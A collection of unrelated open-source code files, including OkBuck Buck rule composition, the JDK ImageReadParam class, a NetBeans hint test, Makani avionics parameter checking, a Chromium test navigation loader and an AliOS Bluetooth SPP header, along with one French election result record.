private static List<Rule> createRules(Project project, boolean integrationTestsEnabled) {
List<Rule> rules = new ArrayList<>();
ProjectType projectType = ProjectUtil.getType(project);
ProjectCache.getTargetCache(project)
.getTargets()
.forEach(
(name, target) -> {
switch (projectType) {
case JAVA_LIB:
case GROOVY_LIB:
case KOTLIN_LIB:
case SCALA_LIB:
rules.addAll(
createRules(
(JvmTarget) target,
projectType.getMainRuleType(),
projectType.getTestRuleType(),
projectType.getIntegrationTestRuleType(),
integrationTestsEnabled));
break;
case ANDROID_LIB:
AndroidLibTarget androidLibTarget = (AndroidLibTarget) target;
List<Rule> targetRules = createRules(androidLibTarget);
rules.addAll(targetRules);
if (androidLibTarget.getLibInstrumentationTarget() != null) {
rules.addAll(
createRules(androidLibTarget.getLibInstrumentationTarget(), targetRules));
}
break;
case ANDROID_APP:
AndroidAppTarget androidAppTarget = (AndroidAppTarget) target;
targetRules = createRules(androidAppTarget);
rules.addAll(targetRules);
if (androidAppTarget.getAppInstrumentationTarget() != null) {
rules.addAll(
createRules(
androidAppTarget.getAppInstrumentationTarget(),
androidAppTarget,
targetRules));
}
break;
default:
throw new IllegalArgumentException(
"Okbuck does not support "
+ project
+ "type projects yet. Please use the extension option okbuck.buckProjects to exclude "
+ project);
}
});
// de-dup rules by name
return new ArrayList<>(new LinkedHashSet<>(rules));
}
private static List<Rule> createRules(
JvmTarget target,
RuleType mainRuleType,
RuleType testRuleType,
RuleType integrationTestRuleType,
boolean integrationTestsEnabled) {
List<Rule> rules =
new ArrayList<>(
JvmLibraryRuleComposer.compose(target, mainRuleType, integrationTestsEnabled));
if (!target.getTest().getSources().isEmpty()) {
rules.add(JvmTestRuleComposer.compose(target, testRuleType));
}
if (integrationTestsEnabled && !target.getIntegrationTest().getSources().isEmpty()) {
rules.add(JvmIntegrationTestRuleComposer.compose(target, integrationTestRuleType));
}
return rules;
}
private static List<Rule> createRules(
AndroidLibTarget target,
@Nullable String appClass,
List<String> extraDeps,
List<String> extraResDeps) {
String manifestRuleName = ":" + AndroidBuckRuleComposer.libManifest(target);
List<Rule> androidLibRules = new ArrayList<>();
// Aidl
List<Rule> aidlRules =
target
.getAidl()
.stream()
.map(aidlDir -> GenAidlRuleComposer.compose(target, aidlDir, manifestRuleName))
.collect(Collectors.toList());
List<String> aidlRuleNames =
aidlRules.stream().map(Rule::buckName).collect(Collectors.toList());
androidLibRules.addAll(aidlRules);
// BuildConfig
if (target.shouldGenerateBuildConfig()) {
androidLibRules.add(AndroidBuildConfigRuleComposer.compose(target));
}
// Jni
androidLibRules.addAll(
target
.getJniLibs()
.stream()
.map(jniLib -> PreBuiltNativeLibraryRuleComposer.compose(target, jniLib))
.collect(Collectors.toList()));
List<String> deps = androidLibRules.stream().map(Rule::buckName).collect(Collectors.toList());
deps.addAll(extraDeps);
// Unified android lib
androidLibRules.add(
AndroidModuleRuleComposer.compose(target, deps, aidlRuleNames, appClass, extraResDeps));
// Test
if (target.getRobolectricEnabled()
&& !target.getTest().getSources().isEmpty()
&& !target.getIsTest()) {
androidLibRules.add(
AndroidTestRuleComposer.compose(target, manifestRuleName, deps, aidlRuleNames, appClass));
}
return new ArrayList<>(androidLibRules);
}
private static List<Rule> createRules(AndroidLibTarget target) {
return createRules(target, null, new ArrayList<>(), new ArrayList<>());
}
private static List<Rule> createRules(
AndroidAppTarget target, List<String> additionalDeps, List<String> additionalResDeps) {
List<String> deps = new ArrayList<>();
deps.add(":" + AndroidBuckRuleComposer.src(target));
deps.addAll(additionalDeps);
List<Rule> libRules =
createRules(
target,
target.getExopackage() != null ? target.getExopackage().getAppClass() : null,
additionalDeps,
additionalResDeps);
List<Rule> rules = new ArrayList<>(libRules);
libRules.forEach(
rule -> {
if (rule instanceof AndroidModuleRule && rule.name() != null) {
deps.add(rule.buckName().replace(":src_", ":res_"));
}
});
Rule keystoreRule = KeystoreRuleComposer.compose(target);
if (target.getExopackage() != null) {
Rule exoPackageRule = ExopackageAndroidLibraryRuleComposer.compose(target);
rules.add(exoPackageRule);
deps.add(exoPackageRule.buckName());
}
if (keystoreRule != null) {
rules.add(keystoreRule);
Rule appManifest = ManifestRuleComposer.composeForBinary(target);
rules.add(appManifest);
rules.add(
AndroidBinaryRuleComposer.compose(
target,
appManifest.buckName(),
deps,
":" + AndroidBuckRuleComposer.keystore(target)));
}
return rules;
}
private static List<Rule> createRules(AndroidAppTarget target) {
return createRules(target, new ArrayList<>(), new ArrayList<>());
}
private static List<Rule> createRules(
AndroidAppInstrumentationTarget target,
AndroidAppTarget mainApkTarget,
List<Rule> mainApkTargetRules) {
List<Rule> libRules =
createRules(
target,
null,
filterAndroidDepRules(mainApkTargetRules),
filterAndroidResDepRules(mainApkTargetRules));
List<Rule> rules = new ArrayList<>(libRules);
Rule testAppManifest = ManifestRuleComposer.composeForBinary(target);
rules.add(testAppManifest);
rules.add(
AndroidInstrumentationApkRuleComposer.compose(
filterAndroidDepRules(rules), mainApkTarget, testAppManifest.buckName()));
rules.add(AndroidInstrumentationTestRuleComposer.compose(mainApkTarget));
return rules;
}
private static List<Rule> createRules(
AndroidLibInstrumentationTarget target, List<Rule> mainLibTargetRules) {
return new ArrayList<>(
createRules(
target,
filterAndroidDepRules(mainLibTargetRules),
filterAndroidResDepRules(mainLibTargetRules)));
}
// android rules now accept only other android rules as deps, and okbuck_android_module
// macro infers what resources rules to depend on
private static List<String> filterAndroidDepRules(List<Rule> rules) {
return rules
.stream()
.filter(rule -> rule instanceof AndroidRule || rule instanceof AndroidModuleRule)
.map(Rule::buckName)
.collect(Collectors.toList());
}
// Same logic as above, so to get the actual resource rule, we derive from the src one
private static List<String> filterAndroidResDepRules(List<Rule> rules) {
return rules
.stream()
.filter(rule -> rule instanceof AndroidRule || rule instanceof AndroidModuleRule)
.map(Rule::buckName)
.map(ruleName -> ruleName.replace(":src_", ":res_"))
.collect(Collectors.toList());
}
}
| 4,771 |
662 | package io.crossbar.autobahn.websocket.messages;
/// An exception occurred in the WS reader or WS writer.
public class Error extends Message {
public Exception mException;
public Error(Exception e) {
mException = e;
}
}
| 80 |
543 | /*
* Copyright (c) 1999, 2014, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
package javax.imageio;
import java.awt.Dimension;
import java.awt.image.BufferedImage;
/**
* A class describing how a stream is to be decoded. Instances of
* this class or its subclasses are used to supply prescriptive
* "how-to" information to instances of {@code ImageReader}.
*
* <p> An image encoded as part of a file or stream may be thought of
* extending out in multiple dimensions: the spatial dimensions of
* width and height, a number of bands, and a number of progressive
* decoding passes. This class allows a contiguous (hyper)rectangular
* subarea of the image in all of these dimensions to be selected for
* decoding. Additionally, the spatial dimensions may be subsampled
* discontinuously. Finally, color and format conversions may be
* specified by controlling the {@code ColorModel} and
* {@code SampleModel} of the destination image, either by
* providing a {@code BufferedImage} or by using an
* {@code ImageTypeSpecifier}.
*
* <p> An {@code ImageReadParam} object is used to specify how an
* image, or a set of images, will be converted on input from
* a stream in the context of the Java Image I/O framework. A plug-in for a
* specific image format will return instances of
* {@code ImageReadParam} from the
* {@code getDefaultReadParam} method of its
* {@code ImageReader} implementation.
*
* <p> The state maintained by an instance of
* {@code ImageReadParam} is independent of any particular image
* being decoded. When actual decoding takes place, the values set in
* the read param are combined with the actual properties of the image
* being decoded from the stream and the destination
* {@code BufferedImage} that will receive the decoded pixel
* data. For example, the source region set using
* {@code setSourceRegion} will first be intersected with the
* actual valid source area. The result will be translated by the
* value returned by {@code getDestinationOffset}, and the
* resulting rectangle intersected with the actual valid destination
* area to yield the destination area that will be written.
*
* <p> The parameters specified by an {@code ImageReadParam} are
* applied to an image as follows. First, if a rendering size has
* been set by {@code setSourceRenderSize}, the entire decoded
* image is rendered at the size given by
* {@code getSourceRenderSize}. Otherwise, the image has its
* natural size given by {@code ImageReader.getWidth} and
* {@code ImageReader.getHeight}.
*
* <p> Next, the image is clipped against the source region
* specified by {@code getSourceXOffset}, {@code getSourceYOffset},
* {@code getSourceWidth}, and {@code getSourceHeight}.
*
* <p> The resulting region is then subsampled according to the
* factors given in {@link IIOParam#setSourceSubsampling
* IIOParam.setSourceSubsampling}. The first pixel,
* the number of pixels per row, and the number of rows all depend
* on the subsampling settings.
* Call the minimum X and Y coordinates of the resulting rectangle
* ({@code minX}, {@code minY}), its width {@code w}
* and its height {@code h}.
*
* <p> This rectangle is offset by
* ({@code getDestinationOffset().x},
* {@code getDestinationOffset().y}) and clipped against the
* destination bounds. If no destination image has been set, the
* destination is defined to have a width of
* {@code getDestinationOffset().x} + {@code w}, and a
* height of {@code getDestinationOffset().y} + {@code h} so
* that all pixels of the source region may be written to the
* destination.
*
* <p> Pixels that land, after subsampling, within the destination
* image, and that are written in one of the progressive passes
* specified by {@code getSourceMinProgressivePass} and
* {@code getSourceNumProgressivePasses} are passed along to the
* next step.
*
* <p> Finally, the source samples of each pixel are mapped into
* destination bands according to the algorithm described in the
* comment for {@code setDestinationBands}.
*
* <p> Plug-in writers may extend the functionality of
* {@code ImageReadParam} by providing a subclass that implements
* additional, plug-in specific interfaces. It is up to the plug-in
* to document what interfaces are available and how they are to be
* used. Readers will silently ignore any extended features of an
* {@code ImageReadParam} subclass of which they are not aware.
* Also, they may ignore any optional features that they normally
* disable when creating their own {@code ImageReadParam}
* instances via {@code getDefaultReadParam}.
*
* <p> Note that unless a query method exists for a capability, it must
* be supported by all {@code ImageReader} implementations
* (<i>e.g.</i> source render size is optional, but subsampling must be
* supported).
*
*
* @see ImageReader
* @see ImageWriter
* @see ImageWriteParam
*/
public class ImageReadParam extends IIOParam {
/**
* {@code true} if this {@code ImageReadParam} allows
* the source rendering dimensions to be set. By default, the
* value is {@code false}. Subclasses must set this value
* manually.
*
* <p> {@code ImageReader}s that do not support setting of
* the source render size should set this value to
* {@code false}.
*/
protected boolean canSetSourceRenderSize = false;
/**
* The desired rendering width and height of the source, if
* {@code canSetSourceRenderSize} is {@code true}, or
* {@code null}.
*
* <p> {@code ImageReader}s that do not support setting of
* the source render size may ignore this value.
*/
protected Dimension sourceRenderSize = null;
/**
* The current destination {@code BufferedImage}, or
* {@code null} if none has been set. By default, the value
* is {@code null}.
*/
protected BufferedImage destination = null;
/**
* The set of destination bands to be used, as an array of
* {@code int}s. By default, the value is {@code null},
* indicating all destination bands should be written in order.
*/
protected int[] destinationBands = null;
/**
* The minimum index of a progressive pass to read from the
* source. By default, the value is set to 0, which indicates
* that passes starting with the first available pass should be
* decoded.
*
* <p> Subclasses should ensure that this value is
* non-negative.
*/
protected int minProgressivePass = 0;
/**
* The maximum number of progressive passes to read from the
* source. By default, the value is set to
* {@code Integer.MAX_VALUE}, which indicates that passes up
* to and including the last available pass should be decoded.
*
* <p> Subclasses should ensure that this value is positive.
* Additionally, if the value is not
* {@code Integer.MAX_VALUE}, then
* {@code minProgressivePass + numProgressivePasses - 1}
* should not exceed
* {@code Integer.MAX_VALUE}.
*/
protected int numProgressivePasses = Integer.MAX_VALUE;
/**
* Constructs an {@code ImageReadParam}.
*/
public ImageReadParam() {}
// Comment inherited
public void setDestinationType(ImageTypeSpecifier destinationType) {
super.setDestinationType(destinationType);
setDestination(null);
}
/**
* Supplies a {@code BufferedImage} to be used as the
* destination for decoded pixel data. The currently set image
* will be written to by the {@code read},
* {@code readAll}, and {@code readRaster} methods, and
* a reference to it will be returned by those methods.
*
* <p> Pixel data from the aforementioned methods will be written
* starting at the offset specified by
* {@code getDestinationOffset}.
*
* <p> If {@code destination} is {@code null}, a
* newly-created {@code BufferedImage} will be returned by
* those methods.
*
* <p> At the time of reading, the image is checked to verify that
* its {@code ColorModel} and {@code SampleModel}
* correspond to one of the {@code ImageTypeSpecifier}s
* returned from the {@code ImageReader}'s
* {@code getImageTypes} method. If it does not, the reader
* will throw an {@code IIOException}.
*
* @param destination the BufferedImage to be written to, or
* {@code null}.
*
* @see #getDestination
*/
public void setDestination(BufferedImage destination) {
this.destination = destination;
}
/**
* Returns the {@code BufferedImage} currently set by the
* {@code setDestination} method, or {@code null}
* if none is set.
*
* @return the BufferedImage to be written to.
*
* @see #setDestination
*/
public BufferedImage getDestination() {
return destination;
}
/**
* Sets the indices of the destination bands where data
* will be placed. Duplicate indices are not allowed.
*
* <p> A {@code null} value indicates that all destination
* bands will be used.
*
* <p> Choosing a destination band subset will not affect the
* number of bands in the output image of a read if no destination
* image is specified; the created destination image will still
* have the same number of bands as if this method had never been
* called. If a different number of bands in the destination
* image is desired, an image must be supplied using the
* {@code ImageReadParam.setDestination} method.
*
* <p> At the time of reading or writing, an
* {@code IllegalArgumentException} will be thrown by the
* reader or writer if a value larger than the largest destination
* band index has been specified, or if the number of source bands
* and destination bands to be used differ. The
* {@code ImageReader.checkReadParamBandSettings} method may
* be used to automate this test.
*
* @param destinationBands an array of integer band indices to be
* used.
*
* @exception IllegalArgumentException if {@code destinationBands}
* contains a negative or duplicate value.
*
* @see #getDestinationBands
* @see #getSourceBands
* @see ImageReader#checkReadParamBandSettings
*/
public void setDestinationBands(int[] destinationBands) {
if (destinationBands == null) {
this.destinationBands = null;
} else {
int numBands = destinationBands.length;
for (int i = 0; i < numBands; i++) {
int band = destinationBands[i];
if (band < 0) {
throw new IllegalArgumentException("Band value < 0!");
}
for (int j = i + 1; j < numBands; j++) {
if (band == destinationBands[j]) {
throw new IllegalArgumentException("Duplicate band value!");
}
}
}
this.destinationBands = destinationBands.clone();
}
}
/**
* Returns the set of band indices where data will be placed.
* If no value has been set, {@code null} is returned to
* indicate that all destination bands will be used.
*
* @return the indices of the destination bands to be used,
* or {@code null}.
*
* @see #setDestinationBands
*/
public int[] getDestinationBands() {
if (destinationBands == null) {
return null;
} else {
return destinationBands.clone();
}
}
/**
* Returns {@code true} if this reader allows the source
* image to be rendered at an arbitrary size as part of the
* decoding process, by means of the
* {@code setSourceRenderSize} method. If this method
* returns {@code false}, calls to
* {@code setSourceRenderSize} will throw an
* {@code UnsupportedOperationException}.
*
* @return {@code true} if setting source rendering size is
* supported.
*
* @see #setSourceRenderSize
*/
public boolean canSetSourceRenderSize() {
return canSetSourceRenderSize;
}
/**
* If the image is able to be rendered at an arbitrary size, sets
* the source width and height to the supplied values. Note that
* the values returned from the {@code getWidth} and
* {@code getHeight} methods on {@code ImageReader} are
* not affected by this method; they will continue to return the
* default size for the image. Similarly, if the image is also
* tiled the tile width and height are given in terms of the default
* size.
*
* <p> Typically, the width and height should be chosen such that
* the ratio of width to height closely approximates the aspect
* ratio of the image, as returned from
* {@code ImageReader.getAspectRatio}.
*
* <p> If this plug-in does not allow the rendering size to be
* set, an {@code UnsupportedOperationException} will be
* thrown.
*
* <p> To remove the render size setting, pass in a value of
* {@code null} for {@code size}.
*
* @param size a {@code Dimension} indicating the desired
* width and height.
*
* @exception IllegalArgumentException if either the width or the
* height is negative or 0.
* @exception UnsupportedOperationException if image resizing
* is not supported by this plug-in.
*
* @see #getSourceRenderSize
* @see ImageReader#getWidth
* @see ImageReader#getHeight
* @see ImageReader#getAspectRatio
*/
public void setSourceRenderSize(Dimension size)
throws UnsupportedOperationException {
if (!canSetSourceRenderSize()) {
throw new UnsupportedOperationException
("Can't set source render size!");
}
if (size == null) {
this.sourceRenderSize = null;
} else {
if (size.width <= 0 || size.height <= 0) {
throw new IllegalArgumentException("width or height <= 0!");
}
this.sourceRenderSize = (Dimension)size.clone();
}
}
/**
* Returns the width and height of the source image as it
* will be rendered during decoding, if they have been set via the
* {@code setSourceRenderSize} method. A
* {@code null} value indicates that no setting has been made.
*
* @return the rendered width and height of the source image
* as a {@code Dimension}.
*
* @see #setSourceRenderSize
*/
public Dimension getSourceRenderSize() {
return (sourceRenderSize == null) ?
null : (Dimension)sourceRenderSize.clone();
}
/**
* Sets the range of progressive passes that will be decoded.
* Passes outside of this range will be ignored.
*
* <p> A progressive pass is a re-encoding of the entire image,
* generally at progressively higher effective resolutions, but
* requiring greater transmission bandwidth. The most common use
* of progressive encoding is found in the JPEG format, where
* successive passes include more detailed representations of the
* high-frequency image content.
*
* <p> The actual number of passes to be decoded is determined
* during decoding, based on the number of actual passes available
* in the stream. Thus if {@code minPass + numPasses - 1} is
* larger than the index of the last available passes, decoding
* will end with that pass.
*
* <p> A value of {@code numPasses} of
* {@code Integer.MAX_VALUE} indicates that all passes from
* {@code minPass} forward should be read. Otherwise, the
* index of the last pass (<i>i.e.</i>, {@code minPass + numPasses - 1})
* must not exceed {@code Integer.MAX_VALUE}.
*
* <p> There is no {@code unsetSourceProgressivePasses}
* method; the same effect may be obtained by calling
* {@code setSourceProgressivePasses(0, Integer.MAX_VALUE)}.
*
* @param minPass the index of the first pass to be decoded.
* @param numPasses the maximum number of passes to be decoded.
*
* @exception IllegalArgumentException if {@code minPass} is
* negative, {@code numPasses} is negative or 0, or
* {@code numPasses} is smaller than
* {@code Integer.MAX_VALUE} but
* {@code minPass + numPasses - 1} is greater than
 * {@code Integer.MAX_VALUE}.
*
* @see #getSourceMinProgressivePass
* @see #getSourceMaxProgressivePass
*/
public void setSourceProgressivePasses(int minPass, int numPasses) {
if (minPass < 0) {
throw new IllegalArgumentException("minPass < 0!");
}
if (numPasses <= 0) {
throw new IllegalArgumentException("numPasses <= 0!");
}
if ((numPasses != Integer.MAX_VALUE) &&
(((minPass + numPasses - 1) & 0x80000000) != 0)) {
throw new IllegalArgumentException
("minPass + numPasses - 1 > INTEGER.MAX_VALUE!");
}
this.minProgressivePass = minPass;
this.numProgressivePasses = numPasses;
}
/**
* Returns the index of the first progressive pass that will be
* decoded. If no value has been set, 0 will be returned (which is
* the correct value).
*
* @return the index of the first pass that will be decoded.
*
* @see #setSourceProgressivePasses
* @see #getSourceNumProgressivePasses
*/
public int getSourceMinProgressivePass() {
return minProgressivePass;
}
/**
* If {@code getSourceNumProgressivePasses} is equal to
* {@code Integer.MAX_VALUE}, returns
* {@code Integer.MAX_VALUE}. Otherwise, returns
* {@code getSourceMinProgressivePass() +
* getSourceNumProgressivePasses() - 1}.
*
* @return the index of the last pass to be read, or
* {@code Integer.MAX_VALUE}.
*/
public int getSourceMaxProgressivePass() {
if (numProgressivePasses == Integer.MAX_VALUE) {
return Integer.MAX_VALUE;
} else {
return minProgressivePass + numProgressivePasses - 1;
}
}
/**
* Returns the number of the progressive passes that will be
* decoded. If no value has been set,
* {@code Integer.MAX_VALUE} will be returned (which is the
* correct value).
*
* @return the number of the passes that will be decoded.
*
* @see #setSourceProgressivePasses
* @see #getSourceMinProgressivePass
*/
public int getSourceNumProgressivePasses() {
return numProgressivePasses;
}
}
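
A short usage sketch, not part of the JDK sources, showing how the parameters described above are typically combined: a source region plus 2x2 subsampling applied through the standard javax.imageio reader API. The file name and region coordinates are placeholders.

import java.awt.Rectangle;
import java.awt.image.BufferedImage;
import java.io.File;
import java.util.Iterator;
import javax.imageio.ImageIO;
import javax.imageio.ImageReadParam;
import javax.imageio.ImageReader;
import javax.imageio.stream.ImageInputStream;

public class ImageReadParamExample {
    public static void main(String[] args) throws Exception {
        try (ImageInputStream input = ImageIO.createImageInputStream(new File("photo.jpg"))) {
            Iterator<ImageReader> readers = ImageIO.getImageReaders(input);
            if (!readers.hasNext()) {
                throw new IllegalStateException("No ImageReader for the given input");
            }
            ImageReader reader = readers.next();
            reader.setInput(input);

            ImageReadParam param = reader.getDefaultReadParam();
            // Decode only a 400x300 window of the source image...
            param.setSourceRegion(new Rectangle(100, 100, 400, 300));
            // ...taking every 2nd pixel in both dimensions (offsets 0, 0).
            param.setSourceSubsampling(2, 2, 0, 0);

            BufferedImage region = reader.read(0, param);
            System.out.println("Decoded " + region.getWidth() + "x" + region.getHeight());
            reader.dispose();
        }
    }
}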
| 6,722 |
348 | {"nom":"Moumour","circ":"4ème circonscription","dpt":"Pyrénées-Atlantiques","inscrits":632,"abs":316,"votants":316,"blancs":22,"nuls":11,"exp":283,"res":[{"nuance":"DVD","nom":"<NAME>","voix":147},{"nuance":"REM","nom":"<NAME>","voix":136}]} | 97 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.java.hints;
import org.netbeans.junit.NbTestCase;
import org.netbeans.modules.java.hints.test.api.HintTest;
/**
*
* @author <NAME>
*/
public class StaticNonFinalUsedInInitializationTest extends NbTestCase {
public StaticNonFinalUsedInInitializationTest(String name) {
super(name);
}
public void testDoNotReport() throws Exception {
HintTest
.create()
.input("package test;\n" +
"public class Test {\n" +
" private static final int A = 5;\n" +
" public static final int B = A + 10;\n" +
"}")
.run(StaticNonFinalUsedInInitialization.class)
.assertWarnings();
}
public void testDoNotReport2() throws Exception {
HintTest
.create()
.input("package test;\n" +
"public class Test {\n" +
" private static int A = 5;\n" +
" public int B = A + 10;\n" +
" public int C;\n" +
" {\n" +
" C = A + 10;" +
" }\n" +
"}")
.run(StaticNonFinalUsedInInitialization.class)
.assertWarnings();
}
public void testReportIt() throws Exception {
HintTest
.create()
.input("package test;\n" +
"public class Test {\n" +
" static int A = 5;\n" +
" static int B = A + 10;\n" +
"}")
.run(StaticNonFinalUsedInInitialization.class)
.assertWarnings("3:19-3:20:verifier:StaticNonFinalUsedInInitialization");
}
public void testReportIt2() throws Exception {
HintTest
.create()
.input("package test;\n" +
"public class Test {\n" +
" static int A = 5;\n" +
" static int B;\n" +
" static {\n" +
" B = A + 10;\n" +
" }\n" +
"}")
.run(StaticNonFinalUsedInInitialization.class)
.assertWarnings("5:12-5:13:verifier:StaticNonFinalUsedInInitialization");
}
}
| 1,632 |
1,178 | /*
* Copyright 2020 Makani Technologies LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "avionics/firmware/params/common.h"
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include "avionics/common/crc.h"
#include "avionics/firmware/params/param_header.h"
static const ParamHeader *GetParamHeader(const void *section_data) {
return (const ParamHeader *)section_data;
}
static const uint8_t *GetParamData(const void *section_data) {
return (const uint8_t*)section_data + sizeof(ParamHeader);
}
static int32_t GetParamDataMaxSize(int32_t section_size) {
return section_size - sizeof(ParamHeader);
}
static bool VerifyParamHeader(const ParamHeader *header, int32_t max_size,
const uint8_t *data) {
if (header->param_format_version != kParamHeaderVersionCurrent)
return false;
if (header->data_length > max_size)
return false;
if (header->data_crc != Crc32(0U, header->data_length, data))
return false;
return true;
}
const void *GetParams(int32_t section_size, const void *section_data,
uint32_t *version_number) {
const ParamHeader *header = GetParamHeader(section_data);
const uint8_t *data = GetParamData(section_data);
int32_t max_size = GetParamDataMaxSize(section_size);
if (!VerifyParamHeader(header, max_size, data)) {
return NULL;
}
*version_number = header->version_number;
return data;
}
| 653 |
2,151 | <gh_stars>1000+
// Copyright (c) 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "content/test/test_navigation_url_loader.h"
#include <utility>
#include "content/browser/loader/navigation_url_loader_delegate.h"
#include "content/common/navigation_subresource_loader_params.h"
#include "content/public/browser/global_request_id.h"
#include "content/public/browser/navigation_data.h"
#include "content/public/browser/render_frame_host.h"
#include "content/public/browser/render_process_host.h"
#include "content/public/browser/ssl_status.h"
#include "content/public/browser/web_contents.h"
#include "content/public/common/browser_side_navigation_policy.h"
#include "net/url_request/redirect_info.h"
#include "services/network/public/cpp/resource_response.h"
#include "services/network/public/mojom/url_loader_factory.mojom.h"
namespace content {
TestNavigationURLLoader::TestNavigationURLLoader(
std::unique_ptr<NavigationRequestInfo> request_info,
NavigationURLLoaderDelegate* delegate)
: request_info_(std::move(request_info)),
delegate_(delegate),
redirect_count_(0),
response_proceeded_(false) {
DCHECK(IsBrowserSideNavigationEnabled());
}
void TestNavigationURLLoader::FollowRedirect() {
redirect_count_++;
}
void TestNavigationURLLoader::ProceedWithResponse() {
response_proceeded_ = true;
}
void TestNavigationURLLoader::SimulateServerRedirect(const GURL& redirect_url) {
net::RedirectInfo redirect_info;
redirect_info.status_code = 302;
redirect_info.new_method = "GET";
redirect_info.new_url = redirect_url;
redirect_info.new_site_for_cookies = redirect_url;
scoped_refptr<network::ResourceResponse> response(
new network::ResourceResponse);
CallOnRequestRedirected(redirect_info, response);
}
void TestNavigationURLLoader::SimulateError(int error_code) {
delegate_->OnRequestFailed(network::URLLoaderCompletionStatus(error_code));
}
void TestNavigationURLLoader::CallOnRequestRedirected(
const net::RedirectInfo& redirect_info,
const scoped_refptr<network::ResourceResponse>& response) {
delegate_->OnRequestRedirected(redirect_info, response);
}
void TestNavigationURLLoader::CallOnResponseStarted(
const scoped_refptr<network::ResourceResponse>& response,
std::unique_ptr<NavigationData> navigation_data) {
// Start the request_ids at 1000 to avoid collisions with request ids from
// network resources (it should be rare to compare these in unit tests).
static int request_id = 1000;
int child_id =
WebContents::FromFrameTreeNodeId(request_info_->frame_tree_node_id)
->GetMainFrame()
->GetProcess()
->GetID();
GlobalRequestID global_id(child_id, ++request_id);
  // Create a bidirectional communication pipe between a URLLoader and a
  // URLLoaderClient. It will be closed at the end of this function. Its sole
  // purpose is to avoid violating DCHECKs when the navigation commits.
network::mojom::URLLoaderClientPtr url_loader_client_ptr;
network::mojom::URLLoaderClientRequest url_loader_client_request =
mojo::MakeRequest(&url_loader_client_ptr);
network::mojom::URLLoaderPtr url_loader_ptr;
network::mojom::URLLoaderRequest url_loader_request =
mojo::MakeRequest(&url_loader_ptr);
auto url_loader_client_endpoints =
network::mojom::URLLoaderClientEndpoints::New(
url_loader_ptr.PassInterface(), std::move(url_loader_client_request));
delegate_->OnResponseStarted(response, std::move(url_loader_client_endpoints),
std::move(navigation_data), global_id, false,
false, base::nullopt);
}
TestNavigationURLLoader::~TestNavigationURLLoader() {}
} // namespace content
| 1,330 |
4,538 | <reponame>wanguojian/AliOS-Things<filename>platform/mcu/haas1000/drivers/services/bt_app/app_spp.h
/*
* Copyright (C) 2015-2020 Alibaba Group Holding Limited
*/
#ifndef __APP_SPP_H__
#define __APP_SPP_H__
#include "spp_api.h"
#include "sdp_api.h"
#ifdef __cplusplus
extern "C" {
#endif
#if defined(__3M_PACK__)
#define L2CAP_MTU 980
#else
#define L2CAP_MTU 672
#endif
#define SPP_RECV_BUFFER_SIZE 3072
#define SPP_MAX_DATA_PACKET_SIZE L2CAP_MTU
#ifdef ENHANCED_STACK
#define BTIF_APP_SPP_SERVER_GSOUND_CTL_ID BTIF_APP_SPP_SERVER_ID_1
#define BTIF_APP_SPP_SERVER_GSOUND_AUD_ID BTIF_APP_SPP_SERVER_ID_2
#define BTIF_APP_SPP_SERVER_TOTAD_ID BTIF_APP_SPP_SERVER_ID_3
#define BTIF_APP_SPP_SERVER_BES_OTA_ID BTIF_APP_SPP_SERVER_ID_4
#define BTIF_APP_SPP_SERVER_AI_VOICE_ID BTIF_APP_SPP_SERVER_ID_5
#define BTIF_APP_SPP_SERVER_GREEN_ID BTIF_APP_SPP_SERVER_ID_6
#define BTIF_APP_SPP_SERVER_RED_ID BTIF_APP_SPP_SERVER_ID_7
#define BTIF_APP_SPP_SERVER_FP_RFCOMM_ID BTIF_APP_SPP_SERVER_ID_8
#define BTIF_APP_SPP_CLIENT_AI_VOICE_ID BTIF_APP_SPP_CLIENT_ID_1
#define BTIF_APP_SPP_CLIENT_CCMP_ID BTIF_APP_SPP_CLIENT_ID_2
#define BTIF_APP_SPP_CLIENT_RED_ID BTIF_APP_SPP_CLIENT_ID_3
/*---------------------------------------------------------------------------
* rfcomm channel number
* should be from 1 to 30
*/
enum RFCOMM_CHANNEL_NUM {
RFCOMM_CHANNEL_GS_CONTROL = RFCOMM_CHANNEL_1,
RFCOMM_CHANNEL_GS_AUDIO = RFCOMM_CHANNEL_2,
RFCOMM_CHANNEL_TOTA = RFCOMM_CHANNEL_3,
RFCOMM_CHANNEL_BES_OTA = RFCOMM_CHANNEL_4,
RFCOMM_CHANNEL_AI_VOICE = RFCOMM_CHANNEL_5,
RFCOMM_CHANNEL_GREEN = RFCOMM_CHANNEL_6,
RFCOMM_CHANNEL_RED = RFCOMM_CHANNEL_7,
RFCOMM_CHANNEL_FP = RFCOMM_CHANNEL_8,
};
#endif
struct spp_device *app_create_spp_device(void);
#if 0
